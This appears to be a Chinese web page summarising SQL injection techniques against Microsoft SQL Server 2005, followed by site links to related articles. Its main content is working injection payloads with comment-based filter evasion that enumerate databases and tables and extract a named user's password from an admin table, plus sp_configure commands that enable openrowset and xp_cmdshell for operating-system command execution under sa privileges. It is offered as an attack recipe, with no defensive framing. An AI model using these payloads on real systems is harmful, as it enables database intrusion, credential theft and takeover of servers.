mssql2005注入方法小结

小妞依然高傲

小妞依然高傲

2016-02-19 11:12

只要你有一台电脑或者手机,都能关注图老师为大家精心推荐的mssql2005注入方法小结,手机电脑控们准备好了吗?一起看过来吧!
爆库语句,修改红色部分的数字挨个猜出库
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--

爆表语句,somedb部份是所要列的数据库,红色数字1累加
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--

爆字段语句,爆表admin里user='icerover'的密码段
/**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--

mssql2005默认没有开xp_cmdshell的,openrowset也不能用
如果是sa权限,可以这样来开启

开启openrowset
EXEC/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--

开启xp_cmdshell
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
展开更多 50%)
分享

猜你喜欢

mssql2005注入方法小结

编程语言 网络编程
mssql2005注入方法小结

开启MSSQL2005的远程登录

编程语言 网络编程
开启MSSQL2005的远程登录

s8lol主宰符文怎么配

英雄联盟 网络游戏
s8lol主宰符文怎么配

MSSQL2005数据库备份导入MSSQL2000

编程语言 网络编程
MSSQL2005数据库备份导入MSSQL2000

MSSQL2005 INSERT,UPDATE,DELETE 之OUTPUT子句使用实例

编程语言 网络编程
MSSQL2005 INSERT,UPDATE,DELETE 之OUTPUT子句使用实例

lol偷钱流符文搭配推荐

英雄联盟 网络游戏
lol偷钱流符文搭配推荐

mssql2005字符串连接方法 避免无效的连接错误

编程语言 网络编程
mssql2005字符串连接方法 避免无效的连接错误

Mssql高级注入笔记II

Web开发
Mssql高级注入笔记II

lolAD刺客新符文搭配推荐

英雄联盟
lolAD刺客新符文搭配推荐

E-mail表单递交

E-mail表单递交

DIV CSS网页布局的基础知识整理

DIV CSS网页布局的基础知识整理
下拉加载更多内容 ↓